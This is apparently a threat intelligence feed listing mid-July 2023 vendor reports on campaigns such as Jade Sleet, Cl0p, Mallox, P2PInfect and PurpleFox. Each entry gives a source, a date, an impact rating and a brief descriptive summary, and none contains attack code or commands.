- GitHub has observed a Jade Sleet social engineering campaign that targets employees of technology firms, particularly those connected to the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Jade Sleet (Storm-0954) is an activity group originating from North Korea that specializes in targeting cryptocurrency-related organizations. They utilize a range of tactics, like developing applications that look like legitimate cryptocurrency apps, to spread their attacks. Jade Sleet has used the multi-platform targeted malware framework (MATA) and Electron frameworks to create implants for both Microsoft Windows and Mac-based systems.
—
- Intel Source:
- ASEC
- Intel Name:
- PurpleFox_Loader_Distributing_via_MS_SQL_Server
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners.
—
- Intel Source:
- Fortinet
- Intel Name:
- Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Cl0p ransomware, operated by the FIN11 threat group, has been a persistent and financially motivated menace since early 2019. This malicious software targets organizations in North America and Europe, encrypting files and exfiltrating sensitive data. Recent attacks have exploited critical vulnerabilities in software, including the MOVEit Transfer SQL injection flaw. The ransom group demands payment in exchange for file decryption and to prevent the public exposure of stolen information.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-cl0p
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Investigation_of_Cloud_Compute_Resource_Abuse
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Microsoft researchers have observed cryptojacking attacks in which targeted organizations incurred more than $300,000 in computing fees.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Diving_Deep_into_Mallox_Ransomware
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have observed an uptick of Mallox ransomware activities with an increase of almost 174% compared to the previous year exploiting MS-SQL servers to distribute the ransomware. Mallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft Windows systems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks.
Source:
https://unit42.paloaltonetworks.com/mallox-ransomware/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The banking sector is facing targeted open-source software supply chain attacks. Malicious actors exploit vulnerabilities in open-source packages, utilizing advanced techniques and deceptive tactics. Traditional controls fall short, necessitating proactive security measures throughout the Software Development Lifecycle (SDLC). Collaboration is key to strengthen defenses against these evolving threats. Checkmarx’s Supply Chain Intelligence offers protection and ongoing tracking.
Source:
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Deceptive_and_Evolving_Malware_Tool
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyfirma has identified a new threat in the cybersecurity landscape – Attacker-Crypter. This powerful tool allows cybercriminals to encrypt, obfuscate, and manipulate malicious code, evading detection by security tools and antivirus software. The freely available tool offers various features to enhance malware capabilities, including process injection, debugger evasion, and network communication.
—
- Intel Source:
- ICS CERT
- Intel Name:
- Attack_Tactics_Against_Industrial_Organizations
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky ICS CERT have looked at a number of assaults on commercial targets in Eastern Europe. The attackers’ goal in the attacks was to create an ongoing conduit for data exfiltration, including data from air-gapped systems. Based on the commonalities between these operations and other efforts that have been previously studied (such as ExCone and DexCone), including the use of FourteenHi variants, particular TTPs, and the scale of the attack.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered a deceitful installer masquerading as an authentic Microsoft Visual Studio installer delivering a Cookie Stealer. This stealer is specifically designed to infiltrate and extract sensitive information stored in browser cookies, allowing attackers to compromise user accounts and invade privacy.
Source:
https://blog.cyble.com/2023/07/25/threat-actor-targeting-developers-via-trojanized-ms-visual-studio/
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Cloud researchers at Unit 42 have found a fresh peer-to-peer (P2P) worm that they named P2PInfect. This worm is capable of cross-platform infections and is written in the highly scalable and cloud-friendly programming language Rust. It targets Redis, a well-known open-source database application that is frequently utilized in cloud environments.
Source:
https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/
—
- Intel Source:
- Proofpoint
- Intel Name:
- Scammers_Targeting_Universities_With_Bioscience_Lures
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have seen a campaign that targets university students in North America in late May 2023 using a variety of email lures with job-related themes. The emails claimed to be from several different organizations, the bulk of which were involved in the biosciences, healthcare, and biotechnology, as well as a few other unrelated ones. The operation went on until June 2023.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has observed Poop69 ransomware appearing in the wild, and shortly after that, another ransomware named BIG HEAD emerged, thought to originate from the same threat actor; it has become popular recently due to its fake Windows update method.
—
- Intel Source:
- Fortinet
- Intel Name:
- Zyxel_Vulnerability_Targeted_by_DDoS_Botnets
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered the spread of many DDoS botnets that are exploiting the Zyxel vulnerability (CVE-2023-28771). The vulnerability is a command injection bug impacting several firewall models that allows an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the targeted device.
Source:
https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771
—
- Intel Source:
- SentinelOne
- Intel Name:
- JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- SentinelOne shared the details after its investigation and attributed this attack to an unnamed “sophisticated nation-state sponsored threat actor”. Additionally, updated IOCs were released, and researchers associated the cluster of threat activity with a North Korean state-sponsored APT. The IOCs are linked to a wide variety of activity that SentinelOne attributes to the DPRK, overall centered on the supply chain targeting approach seen in previous campaigns.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers at EclecticIQ have discovered a spearphishing effort that uses vulnerable Zimbra and Roundcube email servers to target governmental institutions. The effort began in January 2023 and has primarily targeted Ukrainian government organizations; however, it has also targeted Spain, Indonesia, and France.
—
- Intel Source:
- Avast
- Intel Name:
- The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- In a recent rise in malware activity, malicious AutoHotkey scripts that launched the HotRat malware on victims’ PCs were bundled with illicit software, according to Avast researchers. This malware spreads via open repositories, with URLs being shared on social media and online discussion boards.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered that, in addition to the use of XSLT (Extensible Stylesheet Language Transformations) and COM hijacking, a distinctive feature of CAPIBAR is the presence of a server part, which is typically installed on infected MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DSC) PowerShell tool, effectively converting a legitimate server into a malware control center.
—
- Intel Source:
- HP Labs
- Intel Name:
- Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Researchers from HP Labs have observed two major malware campaigns delivering Vidar Stealer and IcedID, both of which use malvertising and imitate well-known software. They also saw other families distributed using this method, including BatLoader and Rhadamanthys Stealer, indicating the growing popularity of this delivery mechanism among threat actors.
Source:
https://threatresearch.ext.hp.com/adverts-mimicking-popular-software-leads-to-malware/?web_view=true
—
- Intel Source:
- Fortinet
- Intel Name:
- Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed threat actors using the new ‘.ZIP’ top-level domain (TLD) to launch sophisticated phishing attacks. These domains can trick users into thinking they are downloading files when they are actually visiting malicious websites.
Source:
https://www.fortinet.com/blog/industry-trends/threat-actors-add-zip-domains-to-phishing-arsenals
—
- Intel Source:
- Securelist
- Intel Name:
- Outlook_Vulnerability_and_Clever_Attacker_Tactics
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Securelist shared their analysis of the CVE-2023-23397 vulnerability in Microsoft Outlook for Windows, which allowed attackers to leak Net-NTLMv2 hashes by sending malicious objects. Samples exploiting this flaw targeted various entities from March 2022 to March 2023. Attackers used compromised ISP routers for hosting fake SMB servers.
Source:
https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/
—
- Intel Source:
- JPCERT/CC
- Intel Name:
- DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- JPCERT/CC has shared that DangerousPassword, a targeted attack group, is targeting developers of cryptocurrency exchange businesses on Windows, macOS, and Linux environments. They use Python and Node.js malware to infect systems. The malware downloads and executes MSI files (Windows) and Python files (macOS, Linux) from external sources, communicating with a C2 server every minute.
Source:
https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Check Point Research (CPR) conducted an analysis of a new malware strain called BundleBot, which is spreading covertly. BundleBot uses the dotnet bundle (single-file), self-contained format, making static detection challenging. The malware is commonly distributed via Facebook Ads and compromised accounts, masquerading as legitimate program utilities, AI tools, and games.
Source:
https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have observed a new campaign called FakeSG that is distributing the NetSupport RAT through hacked WordPress websites. It uses fake browser update templates to deceive users. The payload is delivered via Internet shortcuts or zipped downloads.
—
- Intel Source:
- Cofense
- Intel Name:
- The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Cofense have observed developments in the phishing and email security scene. The use of HTML attachments in dangerous phishing attempts has increased significantly, by 168% and 450%, respectively, compared to both Q1 and Q2 of the preceding two years.
Source:
https://cofense.com/blog/html-attachments-used-in-malicious-phishing-campaigns/
—
- Intel Source:
- Permiso
- Intel Name:
- Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Permiso have observed attackers using an agile approach for mass cloud credential harvesting and crypto mining. They developed and deployed incremental iterations of their malware, targeting multiple cloud services. The campaign includes multi-cloud support, possible German-speaking actors, and hosting on Nice VPS.
—
- Intel Source:
- Rapid7
- Intel Name:
- Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Rapid7 have discovered that criminals are actively taking advantage of two ColdFusion flaws to circumvent authentication, remotely execute commands, and install webshells on vulnerable servers. Threat actors are combining exploits for the critical remote code execution vulnerability CVE-2023-38203 and the access control bypass vulnerability CVE-2023-29298.
—
- Intel Source:
- Sonatype
- Intel Name:
- NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Sonatype’s automated malware detection systems discovered sonatype-2023-2950, a malicious PyPI package with the name “feur,” which has since been taken down.
—
- Intel Source:
- Symantec
- Intel Name:
- Modified_Sardonic_Backdoor_by_FIN8_Group
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Symantec researchers have found evidence of the financially motivated threat actor known as FIN8 employing a “revamped” variation of the Sardonic backdoor to spread the BlackCat ransomware.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor
—
- Intel Source:
- Netskope
- Intel Name:
- AWS_Amplify_Hosted_Phishing_Campaigns
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Over the last couple of months, Netskope Threat Labs researchers observed an increase in traffic to phishing pages hosted on AWS Amplify. These attacks have been targeting victims across different segments, led by the technology and finance verticals.
Source:
https://www.netskope.com/de/blog/aws-amplify-hosted-phishing-campaigns-abusing-telegram-static-forms
—
- Intel Source:
- BleepingComputer, JumpCloud
- Intel Name:
- JumpCloud_had_a_breach_by_state_backed_APT_hacking_group
- Date of Scan:
- 2023-07-23
- Impact:
- MEDIUM
- Summary:
- US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. The company discovered the incident on June 27, one week after the attackers breached its systems via a spear-phishing attack. On July 5, JumpCloud discovered “unusual activity in the commands framework for a small set of customers” while investigating the attack and analyzing logs for signs of malicious activity.
Source:
https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/
https://jumpcloud.com/support/july-2023-iocs
—
- Intel Source:
- Microsoft
- Intel Name:
- The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Earlier this month, Microsoft shared detailed information about a malicious campaign by the threat actor Storm-0558 that targeted customer email. Microsoft continued their investigation into this incident and deployed defense in depth to harden all systems involved; they are additionally providing a deeper analysis of the observed actor techniques for obtaining unauthorized access to email data, the tools used, and unique infrastructure characteristics.
—
- Intel Source:
- Perception Point
- Intel Name:
- A_complex_phishing_operation_Manipulated_Caiman
- Date of Scan:
- 2023-07-22
- Impact:
- LOW
- Summary:
- Perception Point investigated a complex phishing operation that was named “Manipulated Caiman”. The threat actor was named Manipulated Caiman based on one of the files analyzed, which contains the words “Loader Manipulado” in its pdb path; the attacker’s origin is likely Latin America. Manipulated Caiman employs spear phishing with malicious attachments to deliver malware such as URSA, an SMTP bruteforce client, a malicious extension installer, a net info checker, and a spammer client.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- The_delivery_of_BlotchyQuasar_malware
- Date of Scan:
- 2023-07-22
- Impact:
- MEDIUM
- Summary:
- IBM Security X-Force discovered some phishing emails leading to packed executable files delivering malware called BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments.
—
- Intel Source:
- eSentire
- Intel Name:
- The_Delivery_of_Sorillus_RAT
- Date of Scan:
- 2023-07-21
- Impact:
- LOW
- Summary:
- eSentire researchers have identified Sorillus RAT and a phishing page being delivered using HTML smuggled files and links hosted on Google’s Firebase Hosting service.
Source:
https://www.esentire.com/blog/google-firebase-hosting-abused-to-deliver-sorillus-rat-phishing-page
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_High_Evasive_Blank_Grabber_Returns
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified an infostealer builder known as ‘Blank Grabber’. It was released in 2022; since then, it has been frequently updated, with 85 contributions to the project in the last month alone. The infostealer targets Windows operating systems and possesses a wide range of capabilities aimed at stealing sensitive information from unsuspecting users.
Source:
https://www.cyfirma.com/outofband/blank-grabber-returns-with-high-evasiveness/
—
- Intel Source:
- Citizenlab
- Intel Name:
- The_Analysis_of_HKLEAKS_Campaign
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Researchers from Citizen Lab have conducted a forensic analysis of the entire identifiable digital footprint of the HKLEAKS campaign. In August 2019, at the height of the Anti-Extradition Bill protests that rocked Hong Kong, a series of websites branded “HKLEAKS” began surfacing on the web. Claiming to be run by anonymous citizens, they systematically exposed (“doxxed”) the personally identifiable information of protesters, journalists, and other individuals perceived as affiliated with the protest movement.
—
- Intel Source:
- Vadesecure
- Intel Name:
- M365_Phishing_Email_Analysis
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Vade’s researchers have detected a new Microsoft 365 phishing attack and analyzed an email containing a malicious HTML attachment.
Source:
https://www.vadesecure.com/en/blog/m365-phishing-email-analysis-eevilcorp
—
- Intel Source:
- Fortinet
- Intel Name:
- Diving_Deep_into_Rancoz_Ransomware
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed that a few months back the Rancoz ransomware first came to the public’s attention. However, it’s important to raise awareness of this ransomware variant, as the most recent victim on their data leak site on TOR dates back just a few weeks to mid-June.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-rancoz
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_activities_of_the_UAC_0010_group_as_of_July_2023
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The continuous accumulation and analysis of data on cyber incidents allows us to conclude that one of the most persistent cyber threats is UAC-0010 (Armageddon), the activities of which are carried out by former “officers” of the State Security Service of Crimea, who in 2014 betrayed their military oath and began to serve the FSB of Russia. The main task of the group is cyberespionage against the security and defense forces of Ukraine. At the same time, we know at least one case of destructive activity at an information infrastructure facility.
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- DomainNetworks_Mail_Scam
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from KrebsOnSecurity have identified DomainNetworks as a fraudulent company behind a snail mail scam targeting domain owners. Its true operators remain unidentified, despite connections to thedomainsvault.com and UBSagency. These scams trick organizations into paying for unnecessary services.
—
- Intel Source:
- Trustwave
- Intel Name:
- Enterprise_Applications_Honeypot_revealed_some_findings
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Trustwave researchers have established a honeypot sensor network across six countries: Russia, Ukraine, Poland, the UK, China, and the United States. They also present the most intriguing findings from their research into exposed, vulnerable enterprise applications, such as Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian Bitbucket, and F5 BIG-IP.
—
- Intel Source:
- Lab52
- Intel Name:
- New_Invitation_From_APT29_to_Use_CCleaner
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from Lab52 have seen a phishing effort that appears to be the Norwegian embassy inviting people to a party. The format of this particular “invitation” is in .svg. When the file is opened, a script is run that mounts and downloads an ISO file that contains the subsequent infection stage. The .svg file serves as an HTML smuggler in this manner, infecting the target and causing them to skip the subsequent stage.
Source:
https://lab52.io/blog/2344-2/
—
- Intel Source:
- Kaspersky, Palant
- Intel Name:
- Malicious_extensions_in_Chrome_Web_Store
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The subpage of the Kaspersky official blog discusses the discovery of malicious extensions in the Chrome Web Store with a total of 87 million downloads. The most popular extension, “Autoskip for Youtube,” had nine million downloads. Users are advised to check and uninstall any malicious extensions as they can access user data.
Source:
https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/
https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
—
- Intel Source:
- Uptycs
- Intel Name:
- Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Cybersecurity researchers remain on the radar of malicious actors: a proof-of-concept (PoC) has been discovered on GitHub that conceals a backdoor with a “crafty” persistence method.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- CERT-HR
- Intel Name:
- WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- CERT-HR researchers note that ‘Ultimate Member’ is a plugin that allows registration and management of communities on WordPress sites. The critical vulnerability (CVE-2023-3460) has been rated 9.8. All versions of the plugin, which has more than 200,000 active installations, are vulnerable.
—
- Intel Source:
- Sucuri
- Intel Name:
- A_variant_of_a_common_malware_injection
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- A recent investigation found malware injecting obfuscated JavaScript into legitimate files, redirecting website traffic to a parked domain for ad monetization. The injected script creates an invisible iframe from the parked domain, generating ad revenue and potentially redirecting visitors to questionable sites.
Source:
https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html
—
- Intel Source:
- Rapid7
- Intel Name:
- Old_Blackmoon_Trojan_NEW_Monetization_Approach
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Rapid7 has discovered a new campaign using the Blackmoon trojan targeting businesses in the USA and Canada. This campaign focuses on implementing evasion and persistence techniques, such as disabling Windows Defender. The trojan uses various persistence techniques, process injection, and exploits for remote services. It disables security tools, hijacks resources, and communicates with a Command and Control server using web protocols. The webpage includes file names, MD5 hashes, email addresses, a reference to a C&C server, and a link to a related article on monitor persistence.
Source:
https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/
—
- Intel Source:
- Wordfence
- Intel Name:
- Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified an ongoing exploit campaign targeting a vulnerability in the WooCommerce Payments plugin. Attackers can gain administrative privileges on vulnerable websites. Wordfence provides protection against this vulnerability.
—
- Intel Source:
- Symantec, Cyble
- Intel Name:
- Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers
- Date of Scan:
- 2023-07-18
- Impact:
- HIGH
- Summary:
- Attackers are making use of a zero-day vulnerability (CVE-2023-36884) that affects Microsoft Windows and Office products. The exploit has so far been applied in extremely targeted attacks against businesses in the European and North American government and defense industries.
Source:
https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-zeroday-exploit
—
- Intel Source:
- FACCT
- Intel Name:
- RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks
- Date of Scan:
- 2023-07-18
- Impact:
- MEDIUM
- Summary:
- According to FACCT, the Russian-speaking Red Curl organization has attacked businesses in the UK, Germany, Canada, Norway, Ukraine, and Australia at least 34 times. Twenty of the attacks—more than half—took place in Russia. Construction, financial, consultancy, retail, banking, insurance, and legal enterprises were among the victims of cyber espionage.
Source:
https://www.facct.ru/blog/redcurl-2023/?utm_source=twitter&utm_campaign=redcurl-23&utm_medium=social
—
- Intel Source:
- Sysdig
- Intel Name:
- SCARLETEEL_2
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Sysdig observed the most recent activities of a new version, SCARLETEEL 2.0. The analysts saw a strategy similar to the one previously reported: compromising AWS accounts by exploiting vulnerable compute services, gaining persistence, and attempting to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped. From the details of the earlier SCARLETEEL activity, it was discovered that they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Credential_Stealer_Expands_to_Azure_GCP_from_AWS
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- This report shows the development of an experienced cloud actor who is knowledgeable about a variety of technologies. The actor apparently underwent a great deal of trial and error, as evidenced by decisions like feeding the curl binary to systems that do not already have it. Additionally, the actor has enhanced the tool’s data layout to promote more autonomous engagement, displaying a certain amount of maturity and proficiency.
—
- Intel Source:
- Talos
- Intel Name:
- Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Talos have identified a threat actor who has been running various campaigns in Poland and Ukraine against civilian users, military groups, and governmental institutions. They determined that these actions are most likely carried out with the intent to steal data and gain ongoing remote access.
Source:
https://blog.talosintelligence.com/malicious-campaigns-target-entities-in-ukraine-poland/
—
- Intel Source:
- Fortinet
- Intel Name:
- Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Several malicious Microsoft Office documents created to take advantage of known vulnerabilities have been found by FortiGate researchers. The remote code execution flaws involved are specifically CVE-2021-40444 and CVE-2022-30190. By taking advantage of these flaws, the attackers were able to insert malicious macros into Microsoft documents that, when used, installed the LokiBot malware on the victim’s computer.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Beware_of_Cloaked_Ursa_Phishing_Scam
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- Unit 42 researchers have observed instances of Cloaked Ursa using lures focusing on the diplomats themselves more than the countries they represent. They also identified Cloaked Ursa targeting diplomatic missions within Ukraine by leveraging something that all recently placed diplomats need – a vehicle.
Source:
https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
—
- Intel Source:
- AT&T
- Intel Name:
- Attackers_Leveraging_OneNote_to_Deliver_Malware
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Malware distributed using phishing emails with a OneNote attachment has increased since December 22nd, 2022. The end user would open the OneNote attachment, as they do with most phishing emails, but OneNote does not support macros like Microsoft Word or Excel do. Threat actors have historically used this method to launch programs that install malware.
—
- Intel Source:
- Aquasec
- Intel Name:
- Introducing_TeamTNT_New_Cloud_Campaign
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- AquaSec researchers have uncovered an emerging campaign that is targeting exposed Docker APIs and JupyterLab instances. Upon further investigation of the infrastructure, they found evidence of a broader campaign orchestrated by TeamTNT.
Source:
https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
—
- Intel Source:
- Lumen
- Intel Name:
- Exploring_AVrecon_Underground_Routers
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Another multi-year scheme involving infected routers all around the world is discovered by Lumen Black Lotus Labs. Small-office/home-office (SOHO) routers are infected as part of a sophisticated operation that uses the Linux-based Remote Access Trojan (RAT) known as “AVrecon.”
Source:
https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble have discovered a noteworthy occurrence involving a trojanized TeamViewer installer file. TeamViewer is a popular software program that enables remote control, desktop sharing, online meetings, file transfers, and group collaboration across numerous devices.
Source:
https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users/
—
- Intel Source:
- ThreatFabric
- Intel Name:
- A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from ThreatFabric have identified a new sophisticated vishing toolset called Letscall, which currently targets individuals from South Korea.
Source:
https://www.threatfabric.com/blogs/letscall-new-sophisticated-vishing-toolset
—
- Intel Source:
- TrendMicro
- Intel Name:
- BPFDoor_Backdoor_Variants_Abusing_BPF_Filters
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- BPFDoor has since become more difficult to detect due to the improved usage of Berkeley Packet Filter (BPF), a technology that allows programs to attach network filters to an open socket that’s being used by the threat actors behind BPFDoor to bypass firewalls’ inbound traffic rules and similar network protection solutions in Linux and Solaris operating systems (OS).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malicious_Extension
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- The specific information on this subpage includes a password-protected RAR archive with the passwords 888 or 999. An MSI file has been analyzed, and it is mentioned that Malwarebytes EDR and MDR can remove ransomware remnants and prevent reinfection. There is also a free trial available for Malwarebytes’ cybersecurity services.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- ASEC has observed the use of Chrome Remote Desktop by the Kimsuky threat group, supported by North Korea, in their attacks. The group utilizes their own AppleSeed malware, as well as other remote control tools like Meterpreter and VNC, to gain control over infected systems. The Kimsuky group mainly distributes malware through spear phishing emails containing HWP and MS Office document files or CHM files. They also use Infostealer to gather sensitive information.
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_Distribution_via_Email
- Date of Scan:
- 2023-07-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a mass mailing of electronic messages with the subject “Invoice” and an attachment in the form of the file “Act_Zvirky_ta_rah.fakt_vid_12_07_2023.zip” containing the VBS file “invoice_from_12_07_2023_to_payment .vbs”; opening it will download and launch the SmokeLoader malware.
—
- Intel Source:
- Mandiant
- Intel Name:
- Stealing_Secrets_With_Infected_USB_Drives
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
